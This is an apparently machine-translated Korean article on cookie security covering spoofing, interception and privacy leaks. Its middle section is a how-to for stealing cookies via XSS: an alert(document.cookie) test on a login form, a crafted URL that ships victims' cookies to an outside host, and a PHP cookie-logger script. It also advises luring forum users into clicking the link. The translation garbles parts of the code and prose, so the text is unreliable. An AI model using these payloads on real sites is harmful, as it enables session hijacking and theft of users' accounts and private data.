쿠키의 목적은 사용자에게 편리하고 웹 사이트에 가치를 더하는 것이며 일반적으로 심각한 보안 위협이되지 않습니다. 쿠키 파일은 코드로 실행될 수 없으며 바이러스를 전송하지 않으며 사용자에게 독점적이며 서버에서만 읽을 수 있습니다. 또한 브라우저는 일반적으로 300 개의 쿠키 만 저장 할 수 있으며 각 사이트는 최대 20 개의 쿠키를 저장하고 각 쿠키의 크기는 4KB로 제한됩니다. 따라서 쿠키는 하드 드라이브를 채우지 않으며 "서비스 거부"공격 방법으로 사용되지 않습니다.
그러나 사용자 신원을 대체 할 때 보안은 때때로 전체 시스템의 보안을 결정하고 쿠키의 보안을 무시할 수 없습니다.
(1) 쿠키 스푸핑 쿠키는 사용자 계정 ID, 비밀번호 등과 같은 정보를 기록하며 일반적으로 MD5 방법을 사용하여 암호화되어 인터넷에 전달됩니다. 암호화 된 정보는 인터넷에서 동기를 가진 일부 사람들이 가로 채워도 이해할 수 없습니다. 그러나 지금 문제는 쿠키를 가로 채는 사람들이 이러한 줄의 의미를 알 필요가 없다는 것입니다. 누군가가 다른 사람의 쿠키를 서버에 제출하고 확인을 전달할 수있는 한 피해자로 웹 사이트에 로그인 할 수 있습니다. 이 동작을 쿠키 스푸핑이라고합니다.
불법 사용자는 쿠키를 통해 해당 암호화 키를 얻으므로 사용자의 이메일 및 계정 정보를 포함하여 합법적 인 사용자의 모든 개인화 된 정보에 액세스하여 개인 정보에 심각한 해를 끼칩니다.
(2) 쿠키 차단
쿠키는 브라우저와 서버 사이에서 일반 텍스트로 전송되며 다른 사람들이 쉽게 가로 채고 악용합니다. 쿠키는 웹 통신을 가로채는 사람이라면 누구나 읽을 수 있습니다.
불법 사용자가 쿠키를 가로 채고 유효한 기간 내에 재생 한 후 불법 사용자는 법적 사용자의 권리와 이익을 누릴 것입니다. 예를 들어, 온라인 읽기의 경우 불법 사용자는 수수료를 지불하지 않고 전자 잡지를 온라인으로 읽을 수 있습니다.
쿠키를 가로 채는 몇 가지 방법이 있습니다.
(1) 프로그래밍 방법을 사용하여 쿠키를 가로 채립니다. 다음은 두 단계로 완료된 방법을 분석하는 것입니다.
1 단계 : 쿠키를 수집하고 분석하고 URL을 구성 해야하는 웹 사이트를 배치하십시오. 먼저 웹 사이트를 열어 쿠키를 수집하십시오. 여기에서 http://www.xxx.net이라고 가정하고 웹 사이트에 로그인하고 사용자 이름 "<al>"(따옴표 제외)를 입력하고 데이터를 분석하고 패킷을 잡고 다음 코드를 얻습니다.
http://www.xxx.net/txl/login/login.pl? username = <al> & passwd = & ok.x = 28 & ok.y = 6;
"<Al>"을 다음과 같이 바꾸십시오.
"<cript> Alert (Document.Cookie) </script>"다시 시도하고 실행이 성공하면 URL 구성을 시작하십시오.
http://www.xxx.net/txl/login/login.pl? username = <cript> wind
그 중 http://www.cbifamily.org/cbi.php는 사용자가 제어 할 수있는 호스트의 스크립트입니다. "%2b"는 "+"가 공간으로 처리되기 때문에 "%2b"는 "+"의 URL 인코딩입니다. 이 URL은 포럼에 게시하여 다른 사람들이 클릭하도록 유도 할 수 있습니다.
2 단계 : 쿠키를 수집하고 사용자가 제어 할 수있는 웹 사이트에 PHP 스크립트를 준비하십시오. 알 수없는 사람이 구성된 URL을 클릭하면 PHP 코드를 실행할 수 있습니다. 이 스크립트의 특정 내용은 다음과 같습니다.
코드 사본은 다음과 같습니다.
<? php
$ info = getenv ( "ouery_string");
if ($ info) {
$ fp = fopen ( "info.txt", "a");
fwrite ($ fp,! info. "/n");
fclose ($ fp);
}
헤더 ( "위치 : http : //www.xxx.net");
?>
이 코드를 네트워크에 넣으면 모든 사람의 쿠키를 수집 할 수 있습니다. 포럼에서 HTML 코드 또는 플래시 태그를 허용하는 경우 이러한 기술을 사용하여 쿠키를 수집하여 포럼에 넣은 다음 게시물에 매력적인 주제를 제공하고 흥미로운 콘텐츠를 작성하고 많은 쿠키를 빠르게 수집 할 수 있습니다. 포럼 에서이 방법으로 많은 사람들의 암호가 도난당했습니다.
(2) Flash의 코드 숨겨진 위험을 사용하여 쿠키를 가로 채립니다. 플래시에는 geturl () 함수가 있습니다. Flash는이 기능을 사용하여 지정된 웹 페이지를 자동으로 열 수 있으며, 이는 사용자를 악의적 인 코드가 포함 된 웹 사이트로 연결할 수 있습니다. 예를 들어, 사용자가 컴퓨터에서 플래시 애니메이션을 즐기면 애니메이션 프레임의 코드가 인터넷에 조용히 연결되어 쿠키를 수집하고 다른 유해한 작업을 수행 할 수있는 특수 코드가 포함 된 매우 작은 페이지를 열 수 있습니다. 웹 사이트는 플래시 파일의 내부 기능이기 때문에이 플래시 조치를 금지 할 수 없습니다.
(3) 쿠키는 네트워크 개인 정보를 누출합니다
쿠키가 온라인 개인 정보 유출로 이어지는 주된 이유는 다음과 같습니다.! 전자 상거래가 증가하고 인터넷에서 거대한 비즈니스 기회가 등장함에 따라 일부 웹 사이트 및 기관은 쿠키를 남용하고 검색 엔진 기술, 데이터 마이닝 기술 및 온라인 속임수 기술을 사용하여 방문자의 허가없이 다른 사람들의 개인 정보를 수집하여 사용자 데이터베이스를 구축하고 광고를 보내는 것과 같은 이익을 얻는 목적을 달성하여 사용자의 개인 정보를 누출시킵니다. "쿠키 정보 전송의 개방성. 쿠키 파일에는 특수 배달 프로세스와 텍스트 특성이 있습니다. 단단히 암호화되지 않은 쿠키 파일은 서버와 클라이언트간에 전송되므로 개인 정보의 누출로 쉽게 유출 될 수 있습니다.
위는 모두 쿠키의 보안에 대한 개인적인 이해입니다. 누락이 있으면 수정하십시오.